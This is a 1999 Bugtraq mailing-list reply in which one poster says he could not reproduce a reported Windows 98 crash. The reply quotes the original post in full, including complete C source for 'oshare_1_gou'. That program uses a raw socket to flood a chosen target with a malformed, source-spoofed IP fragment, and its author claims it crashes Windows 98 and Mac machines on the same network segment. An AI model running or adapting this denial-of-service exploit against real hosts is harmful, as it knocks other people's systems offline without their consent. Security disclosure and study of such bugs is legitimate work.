[9252] in bugtraq
Re: Win98 crash?
daemon@ATHENA.MIT.EDU (Dimitris Evmorfopoulos)
Wed Jan 27 13:31:41 1999
Date: Wed, 27 Jan 1999 11:15:25 +0200
Reply-To: Dimitris Evmorfopoulos <devmorfo@ALGO.COM.GR>
From: Dimitris Evmorfopoulos <devmorfo@ALGO.COM.GR>
X-To: DEF CON ZERO WINDOW <defcon0@UGTOP.COM>
To: BUGTRAQ@NETSPACE.ORG
This is a multi-part message in MIME format.
--------------A854A02438BAED94989D4D2E
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
No matter where and how I tried to make this work, nothing happens. All Win98 systems we have here simply ignore the transmissions we send out.
DEF CON ZERO WINDOW wrote:
> Hi,
>
> Windows98 crashed by the packet which added a hand to the value of the
> IP header of the packet a little. (From now, the packet of this structure
> is called with "oshare packet".) Because it isn't familiar, I don't know
> what kind of error happens concretely inside OS to the inside of Windows.
> But, ihl and tot_len. Then, it guesses that crash will happen by the
> value of frag_bit&frag_off.
>
> But, because value is wrong, this "oshare packet" can't be transmitted
> to the outside of the network. This is here well, and it is here badly,
> too. But, even whose machine will be able to be killed in the same
> segment.
>
> Before someone improves this program, MicroSoft should take a
> countermeasure immediately.
>
> A Macintosh crashed by the "oshare packet" in the same way, too.
> But, it isn't realized by this program. It will be released soon.
>
> Reboot hangs freely if it becomes blue screen when Windows98 receives
> a "oshare packet". When blue screen comes out, the function of the
> network can't be used any more after it. The error of TCP/IP is started
> in the case of the Macintosh, and the function of the network can't be
> used any more.
>
> Is this phenomenon a bug? $B!3 (B( $B!-!<!. (B) $B%N (B
>
> Signed by R00t Zer0
> -------------------
>
> /****************************************************************************/
> /* [ oshare_1_gou ver 0.1 ] -- Dressing up No.1 -- */
> /* */
> /* */
> /* This program transmits the "oshare" packet which starts a machine aga- */
> /* in or crash. But, because it can't pass through the router, it can be */
> /* carried out only in the same segment. */
> /* "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */
> /* nged, it has already tested that it becomes possible to kill Mac, too. */
> /* ----------------------------------------- */
> /* Written by R00t Zer0 */
> /* E-Mail : defcon0@ugtop.com */
> /* Web URL : http://www.ugtop.com/defcon0/index.htm */
> /****************************************************************************/
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <netdb.h>
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <netinet/in.h>
> #include <netinet/ip.h>
> #include <netinet/tcp.h>
> #include <netinet/in_systm.h>
> #include <arpa/inet.h>
>
> u_short in_cksum( u_short *, int );
> int send_oshare_packet( int, u_long );
>
> u_short
> in_cksum( u_short *addr, int len )
> {
> int nleft = len;
> u_short *w = addr;
> int sum = 0;
> u_short answer = 0;
>
> while( nleft > 1 )
> {
> sum += *w++;
> nleft -= 2;
> }
>
> if (nleft == 1)
> {
> *( u_char *)( &answer ) = *( u_char *)w;
> sum += answer;
> }
>
> sum = ( sum >> 16 ) + ( sum & 0xffff );
> sum += ( sum >> 16 );
> answer = ~sum;
> return( answer );
> }
>
> int
> send_oshare_packet( int sock_send, u_long dst_addr )
> {
> char *packet;
> int send_status;
> struct iphdr *ip;
> struct sockaddr_in to;
>
> packet = ( char *)malloc( 40 );
> ip = ( struct iphdr *)( packet );
> memset( packet, 0, 40 );
>
> ip->version = 4;
> ip->ihl = 11;
> ip->tos = 0x00;
> ip->tot_len = htons( 44 );
> ip->id = htons( 1999 );
> ip->frag_off = htons( 16383 );
> ip->ttl = 0xff;
> ip->protocol = IPPROTO_UDP;
> ip->saddr = htonl( inet_addr( "1.1.1.1" ) );
> ip->daddr = dst_addr;
> ip->check = in_cksum( ( u_short *)ip, 44 );
>
> to.sin_family = AF_INET;
> to.sin_port = htons( 0x123 );
> to.sin_addr.s_addr = dst_addr;
>
> send_status = sendto( sock_send, packet, 40, 0,
> ( struct sockaddr *)&to, sizeof( struct sockaddr ) );
>
> free( packet );
> return( send_status );
> }
>
> int
> main( int argc, char *argv[] )
> {
> char tmp_buffer[ 1024 ];
> int loop, loop2;
>
> int sock_send;
> u_long src_addr, dst_addr;
> u_short src_port, dst_port;
>
> struct hostent *host;
> struct sockaddr_in addr;
>
> time_t t;
>
> if( argc != 3 )
> {
> printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] );
> exit( -1 );
> }
>
> t = time( 0 );
> srand( ( u_int )t );
>
> memset( &addr, 0, sizeof( struct sockaddr_in ) );
> addr.sin_family = AF_INET;
> addr.sin_addr.s_addr = inet_addr( argv[1] );
> if( addr.sin_addr.s_addr == -1 )
> {
> host = gethostbyname( argv[1] );
> if( host == NULL )
> {
> printf( "Unknown host %s.\n", argv[1] );
> exit( -1 );
> }
> addr.sin_family = host->h_addrtype;
> memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
> }
> memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );
>
> if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1)
> {
> perror( "Getting raw send socket" );
> exit( -1 );
> }
>
> printf( "\n\"Oshare Packet\" sending" );
> fflush( stdout );
> for( loop = 0; loop < atoi( argv[2] ); loop++ )
> {
> for( loop2 = 0; loop2 < 1000; loop2++ )
> send_oshare_packet( sock_send, dst_addr );
> fprintf( stderr, "." );
> fflush( stdout );
> }
> printf( "\n\nDone.\n\n" );
> fflush( stdout );
>
> close( sock_send );
> exit( 0 );
> }
--------------A854A02438BAED94989D4D2E
Content-Type: text/x-vcard; charset=us-ascii;
name="devmorfo.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Dimitris Evmorfopoulos
Content-Disposition: attachment;
filename="devmorfo.vcf"
begin:vcard
n:Evmorfopoulos;Dimitris
x-mozilla-html:FALSE
org:Algosystems S.A.;ATTS
adr:;;;;;;
version:2.1
email;internet:devmorfo@algo.com.gr
x-mozilla-cpt:;0
fn:Dimitris Evmorfopoulos
end:vcard
--------------A854A02438BAED94989D4D2E--
